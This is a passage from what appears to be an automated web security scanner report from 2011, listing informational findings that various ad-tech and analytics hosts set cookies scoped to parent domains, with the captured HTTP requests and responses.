if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...

10.13. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13933&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU6lf.fVeAIymmN1SQMQiY3K8TkjADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQZQKgq8xSjICExPOxn5gRSDAR8DIzMjCxMrPxsjOyMHIycjFyM3Iw8jLyMfWAFLJqMIUN3SArAuBTOIYAiTCKMoUFh.FzcrE3aNi90ZgY6CJVqQCxgAgheTPA--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUdGc9RhW_mTSRLtae_2aqZWuBa4kDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWdgrkEgYGANcJlFc-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:44 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=101339&t=2
Content-Length: 0
Date: Mon, 09 May 2011 15:35:43 GMT


10.14. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035073&rn=1981680086&c7=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c8=Business%20news%20articles%20and%20blogs%20-%20The%20Christian%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:34:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.15. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=2114357914 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:35:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.16. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732017&c4=194941149&c5=1&c6=41&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c9=&c10=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c15=&1304955322131 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 15:35:23 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.17. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:38:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:38:27 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:38:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


10.18. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955485.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

10.22. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=AQAAAAAADEAAAAAAAAAMQAAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAehMn5gAAAAA.&tt_code=vert-107&udj=uf%28%27a%27%2C+9797%2C+1304955326%29%3Buf%28%27c%27%2C+45814%2C+1304955326%29%3Buf%28%27r%27%2C+173255%2C+1304955326%29%3Bppv%288991%2C+%277215316608111068896%27%2C+1304955326%2C+1304998526%2C+45814%2C+25553%29%3B&cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.&referrer=http://www.csmonitor.com/Business&pp=TcgJqwAJrDQK5ToFmVxG_jr_KjIn-i4M6rRykw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
